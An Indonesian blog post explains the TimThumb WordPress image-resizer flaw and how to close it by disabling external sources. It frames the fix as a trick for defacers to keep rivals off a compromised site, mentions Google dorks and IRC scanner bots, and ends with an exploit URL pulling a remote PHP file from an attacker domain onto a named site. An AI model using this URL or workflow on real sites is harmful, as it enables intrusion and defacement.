Oke saya hanya mencoba sharing tentang judul di atas,langgsung saja. Sedikir penjelasan tetang apa itu plugin timthumb?
Timthumb adalah sebuah library yang fungsinya untuk resizing image. Timthumb digunakan secara luas oleh developer untuk membangun website yang paling umum digunakan adalah pada platform WordPress.
Timthumb mempunyai bugs atau celah yang rentan di manfaatkan oleh hacker untuk menembus website yang berbasi WordPress. Issue ini pertama kali ditemukan oleh Mark Maunder dan ditulis diblognya. Hal ini juga sudah di konfirmasi oleh pengembang Timthumb.
Timthumb mempunyai bugs atau celah yang rentan di manfaatkan oleh hacker untuk menembus website yang berbasi WordPress. Issue ini pertama kali ditemukan oleh Mark Maunder dan ditulis diblognya. Hal ini juga sudah di konfirmasi oleh pengembang Timthumb.
Celah yang di temukan adalah timthumb mengizinkan pihak ketiga untuk upload dan execute script PHP selama di direktori atau folder timthumb. Karena celah itulah attacker bisa memanfaatkan apapun yang diinginkan selama file timthumb ini belum di update.
terkadang si pelaku/peretas menggunakan menggunakan dork timthumb yang mudah di temukan di google dan melakukan scanning lewat bot di IRC yang mempunyai fasilitas bot scanner
Sedikit basa basi gan :v
Mungkin ini solusi anti tikung" club saat deface
ok langsung aja ke tutorial nya:
##Pertama##
Pastikan nilai ALLOW_EXTERNAL adalah false
seperti ini codenya
[code]
define ('ALLOW_EXTERNAL', FALSE); [/code]
define ('ALLOW_EXTERNAL', FALSE); [/code]
##Kedua##
Hapus nama domain pada $allowedsites , liat code dibawah
[code]$allowedSites = array (
‘flickr.com’,
‘picasa.com’,
‘img.youtube.com’,
‘upload.wikimedia.org’,
);[/code]
‘flickr.com’,
‘picasa.com’,
‘img.youtube.com’,
‘upload.wikimedia.org’,
);[/code]
Dan code diatas diubah menjadi kayak gini
[code]
$allowedSites = array();[/code]
$allowedSites = array();[/code]
Maka celah timthumb tersebut telah di tutup,
brikut buktinya :
"http://www.putribalidesign.com/function/timthumb.php?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php"
Sekian dari saia,
wassalamualaikum..

Comments
Post a Comment